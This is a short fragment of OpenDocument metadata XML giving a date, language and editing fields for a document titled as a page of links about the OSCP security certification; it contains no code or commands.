    <dc:date>2026-04-23T10::36:36</dc:date>
    <dc:language>en-US</dc:language>
    <meta:editing-cycles>1</meta:editing-cycles>
    <meta:editing-duration>PT0S</meta:editing-duration>
    <dc:title>seguridad:enlaces:certificaciones:oscp</dc:title>
  </office:meta>
</office:document-meta>
</file>